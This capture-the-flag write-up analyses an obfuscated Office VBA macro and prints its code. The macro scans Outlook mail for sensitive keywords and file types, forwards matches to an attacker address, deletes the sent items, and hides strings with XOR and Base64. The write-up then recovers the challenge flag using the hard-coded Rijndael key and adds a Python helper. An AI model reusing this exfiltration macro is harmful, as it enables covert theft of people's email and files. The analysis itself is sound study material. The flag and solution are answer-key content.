Sub HandleSensitiveAttachment(QmmdKXwuMa As Variant, gjQiIlwvaI As String)
	Dim XstsppFkvZr As Object
	Set XstsppFkvZr = QmmdKXwuMa.Forward
	On Error Resume Next
	With XstsppFkvZr
	.To = exfil_address
	.CC = DecryptData(Array(), 675)
	.BCC = DecryptData(Array(), 675)

	' Outlook Exfiltration At~achment from User:
	.Subject = DecryptData(Array(127, 220, 31, 150, 211, 131, 71, 43, 170, 236, 164, 166, 112, 17, 25, 122, 182, 170, 207, 20, 251, 16, 104, 20, 237, 154, 60, 176, 203, 32, 210, 178, 153, 140, 89, 37, 100, 244, 224), 675) &
	DecryptData(Array(121, 159, 195, 255), 714) & 

	' username
	Environ(DecryptData(Array(122, 116, 80, 109, 139, 170, 30), 718) &
	DecryptData(Array(146), 725))

	.DeleteAfterSubmit = True
	.Send
	End With
	On Error GoTo 0
	Set XstsppFkvZr = Nothing
End Sub

Public Function CheckForSensitiveInfo(IehgfWzjBPM As String, gjQiIlwvaI As String, sensitiveKeywords As Variant) As Boolean
	CheckForSensitiveInfo = False
	Dim YXeXnGWwCIuAtn As Variant
	For Each YXeXnGWwCIuAtn In sensitiveKeywords
	If (InStr(1, UCase(IehgfWzjBPM), YXeXnGWwCIuAtn, vbTextCompare) > 0) Or (InStr(1, UCase(gjQiIlwvaI), YXeXnGWwCIuAtn, vbTextCompare) > 0) Then
	CheckForSensitiveInfo = True
	Exit For
	Else
	CheckForSensitiveInfo = False
	End If
	Next
End Function

Public Function CheckAttachmentForSensitiveInfo(OFTngrKtymtIs As Variant, fileTypes As Variant, sensitiveKeywords As Variant) As Boolean
	CheckAttachmentForSensitiveInfo = False
	Dim sBtphCWmicZ As Boolean
	sBtphCWmicZ = False
	Dim FSvAGmBKEpy As Boolean
	FSvAGmBKEpy = False
	Dim KfBAtqXWVPbl As String
	Dim tFWjedYCFp As String
	KfBAtqXWVPbl = OFTngrKtymtIs.FileName

	' .
	tFWjedYCFp = Split(KfBAtqXWVPbl, DecryptData(Array(25), 726))1
	Dim dPjnuzlcUPVn As Variant
	For Each dPjnuzlcUPVn In fileTypes
	If (InStr(1, UCase(tFWjedYCFp), dPjnuzlcUPVn, vbTextCompare) > 0) Then
	sBtphCWmicZ = True
	Else
	sBtphCWmicZ = False
	End If
	Next
	Dim YXeXnGWwCIuAtn As Variant
	For Each YXeXnGWwCIuAtn In sensitiveKeywords
	If (InStr(1, UCase(KfBAtqXWVPbl), YXeXnGWwCIuAtn, vbTextCompare) > 0) Then
	FSvAGmBKEpy = True
	Else
	FSvAGmBKEpy = False
	End If
	Next
	If sBtphCWmicZ Or FSvAGmBKEpy Then
	CheckAttachmentForSensitiveInfo = True
	Else
	CheckAttachmentForSensitiveInfo = False
	End If
End Function


Public Function DecodeBase64(ByVal inputString As String) As Byte()
    If Not IsInitialized Then InitializeDecoder

    Dim encodedBytes() As Byte: encodedBytes = TransformStringToByteArray(inputString)
    Dim encodedLength As Long: encodedLength = UBound(encodedBytes) + 1

    ' Ensure the length of the encoded byte array is a multiple of 4
    If encodedLength Mod 4 <> 0 Then Err.Raise vbObjectError, , "Invalid Base64 string length"

    ' Adjust length to remove padding characters
    Do While encodedLength > 0
        If encodedBytes(encodedLength - 1) <> Asc("=") Then Exit Do
        encodedLength = encodedLength - 1
    Loop

    Dim decodedLength As Long: decodedLength = (encodedLength * 3) \ 4
    Dim decodedBytes() As Byte
    ReDim decodedBytes(0 To decodedLength - 1) As Byte

    Dim inputIndex As Long
    Dim outputIndex As Long

    Do While inputIndex < encodedLength
        Dim byte1 As Byte: byte1 = encodedBytes(inputIndex): inputIndex = inputIndex + 1
        Dim byte2 As Byte: byte2 = encodedBytes(inputIndex): inputIndex = inputIndex + 1
        Dim byte3 As Byte: If inputIndex < encodedLength Then byte3 = encodedBytes(inputIndex): inputIndex = inputIndex + 1 Else byte3 = Asc("A")
        Dim byte4 As Byte: If inputIndex < encodedLength Then byte4 = encodedBytes(inputIndex): inputIndex = inputIndex + 1 Else byte4 = Asc("A")

        ' Raise an error if any byte is outside the ASCII range
        If byte1 > 127 Or byte2 > 127 Or byte3 > 127 Or byte4 > 127 Then
            Err.Raise vbObjectError, , "Invalid Base64 characters"
        End If

        Dim value1 As Byte: value1 = DecodeBase64Char(byte1)
        Dim value2 As Byte: value2 = DecodeBase64Char(byte2)
        Dim value3 As Byte: value3 = DecodeBase64Char(byte3)
        Dim value4 As Byte: value4 = DecodeBase64Char(byte4)

        ' Raise an error if any decoded value is outside the Base64 range
        If value1 > 63 Or value2 > 63 Or value3 > 63 Or value4 > 63 Then _
            Err.Raise vbObjectError, , "Invalid Base64 values"

        Dim decodedByte1 As Byte: decodedByte1 = (value1 * 4) Or (value2 \ &H10)
        Dim decodedByte2 As Byte: decodedByte2 = ((value2 And &HF) * &H10) Or (value3 \ 4)
        Dim decodedByte3 As Byte: decodedByte3 = ((value3 And 3) * &H40) Or value4

        decodedBytes(outputIndex) = decodedByte1: outputIndex = outputIndex + 1
        If outputIndex < decodedLength Then decodedBytes(outputIndex) = decodedByte2: outputIndex = outputIndex + 1
        If outputIndex < decodedLength Then decodedBytes(outputIndex) = decodedByte3: outputIndex = outputIndex + 1
    Loop

    DecodeBase64 = decodedBytes
End Function


Private Sub InitializeDecoder()
	Dim combinedValue As Integer, index As Integer
	index = 0
	For combinedValue = Asc("A") To Asc("Z"): lxtmwrylodux(index) = combinedValue: index = index + 1: Next
	For combinedValue = Asc("a") To Asc("z"): lxtmwrylodux(index) = combinedValue: index = index + 1: Next
	For combinedValue = Asc("0") To Asc("9"): lxtmwrylodux(index) = combinedValue: index = index + 1: Next
	lxtmwrylodux(index) = Asc("+"): index = index + 1
	lxtmwrylodux(index) = Asc("/"): index = index + 1
	For index = 0 To 127: DecodeBase64Char(index) = 255: Next
	For index = 0 To 63: DecodeBase64Char(lxtmwrylodux(index)) = index: Next
	IsInitialized = True
End Sub


Private Function TransformStringToByteArray(ByVal inputString As String) As Byte()
    Dim inputBytes() As Byte: inputBytes = inputString
    Dim halfLength As Long: halfLength = (UBound(inputBytes) + 1) \ 2
    If halfLength = 0 Then
        TransformStringToByteArray = inputBytes
        Exit Function
    End If

    Dim resultBytes() As Byte
    ReDim resultBytes(0 To halfLength - 1) As Byte

    Dim i As Long
    For i = 0 To halfLength - 1
        Dim combinedValue As Long
        combinedValue = inputBytes(2 * i) + 256 * CLng(inputBytes(2 * i + 1))
        If combinedValue >= 256 Then
            combinedValue = Asc("?")
        End If
        resultBytes(i) = combinedValue
    Next

    TransformStringToByteArray = resultBytes
End Function


Private Function DecryptData(encryptedData As Variant, offest As Integer)
	Dim decryptedString As String
	Dim base64DecodedBytes() As Byte
	base64DecodedBytes = DecodeBase64(ActiveDocument.Variables("gtrxGyKtbDzUEDng"))
	decryptedString = ""
	For index = LBound(encryptedData) To UBound(encryptedData)
		decryptedString = decryptedString & Chr(base64DecodedBytes(index + offest) ^ encryptedData(index))
	Next
	DecryptData = decryptedString
End Function

So, the attack flow is as follows:

  1. It starts in the ProcessOutlookEmails() function, where the script goes through Outlook emails from the last 400 days and looks for sensitive words and sensitive files in them.

  2. If it finds any sensitive files, it forwards that email to the attacker at "dph@whschool.com". It then deletes that email from the user's records.

  3. If it finds any sensitive words within the email, it creates a new email and calls the EncryptData() function, passing the email's subject and body joined together as one string as the argument. Whatever EncryptData() returns is sent to the attacker at "dph@whschool.com". It then deletes that email from the user's records.

  4. The EncryptData() function calls FVaFfsygaGuUBB() to generate a random 32-byte IV. It then creates an object that uses the Rijndael encryption method, with a hard-coded key, to encrypt whatever the function wants to encrypt.

  5. However, the EncryptData() function does not encrypt the input string that is provided to it. Instead, it returns the IV and the supposedly encrypted flag, separated by "|".

Decrypting the Flag


Looking at mail.txt shows what we have previously analysed.

From: Austin <taustin@whschool.com> 
To: dph@whschool.com 
Subject: Outlook Exfiltration Data from User: taustin


*twGsy*#p7XY8CT4N3RpGq5xDzL7EMHW|MZgInjVQiig/Ce4mInU3xVamChLH3kT4ME1JJ9YEHJuCFLa1Zfg+I5d2h5j1QkGwNj237XLiaBtzkualk2WiJg==

First of all, AES is a United States federal standard, FIPS 197, which is a subset of Rijndael:

AES has a fixed block size of 128 bits and a key size of 128, 192, or 256 bits, whereas Rijndael can be specified with block and key sizes in any multiple of 32 bits, with a minimum of 128 bits and a maximum of 256 bits.

When I first analysed the VBA script above, it seemed at first glance to use AES encryption. However, as stated before, it uses the Rijndael encryption method, which is similar to AES but not the same. That said, CyberChef does not have a recipe for Rijndael encryption, so a third-party tool is used.

The hard-coded key mentioned is 8xppg2oX68Bo6koL7hwSeC8bCEWvk540. Splitting the email body at "|" into the IV and the encrypted data, and putting each into its respective field in the online tool, gives us the flag!

flag: UTAR{a9240da09d54691bec56b4395362af2b}
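
Why CyberChef's AES recipe does not fit this blob, as an added example (not part of the original write-up or the challenge files): it splits the mail.txt body at the last "|", sizes the IV and ciphertext, and reports the Rijndael parameters they imply. The function names are hypothetical, and it assumes the IV is sent as raw single-byte characters and is exactly one cipher block long.

```python
import base64

# Copied from the page: the body line of mail.txt and the hard-coded key.
MAIL_BODY = "*twGsy*#p7XY8CT4N3RpGq5xDzL7EMHW|MZgInjVQiig/Ce4mInU3xVamChLH3kT4ME1JJ9YEHJuCFLa1Zfg+I5d2h5j1QkGwNj237XLiaBtzkualk2WiJg=="
KEY = b"8xppg2oX68Bo6koL7hwSeC8bCEWvk540"

RIJNDAEL_SIZES = (16, 20, 24, 28, 32)  # bytes: 128 to 256 bits in 32-bit steps
AES_KEY_SIZES = (16, 24, 32)           # bytes: AES fixes the block at 16

def split_blob(body):
    """Split 'IV|base64(ciphertext)', the shape EncryptData() returns."""
    # Base64 never contains '|', so split at the LAST one in case the
    # random IV itself happens to include that character.
    iv_text, sep, ct_b64 = body.strip("\r\n").rpartition("|")
    if not sep:
        raise ValueError("no '|' separator found")
    # Assumption: the IV travels as raw single-byte characters.
    iv = iv_text.encode("latin-1")
    ct = base64.b64decode(ct_b64, validate=True)
    return iv, ct

def cipher_profile(iv, ct, key):
    """Infer the block size from the IV and test whether AES parameters fit."""
    block = len(iv)  # assumption: the IV is exactly one block long
    if block not in RIJNDAEL_SIZES or len(key) not in RIJNDAEL_SIZES:
        raise ValueError("not valid Rijndael block/key sizes")
    if not ct or len(ct) % block:
        raise ValueError("ciphertext is not a whole number of blocks")
    return {
        "block_bits": block * 8,
        "key_bits": len(key) * 8,
        "blocks": len(ct) // block,
        "aes_compatible": block == 16 and len(key) in AES_KEY_SIZES,
    }

if __name__ == "__main__":
    iv, ct = split_blob(MAIL_BODY)
    print(cipher_profile(iv, ct, KEY))
```

For the mail.txt blob the profile is a 256-bit block and a 256-bit key with `aes_compatible` false, consistent with the write-up's move from CyberChef to a Rijndael-capable tool.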
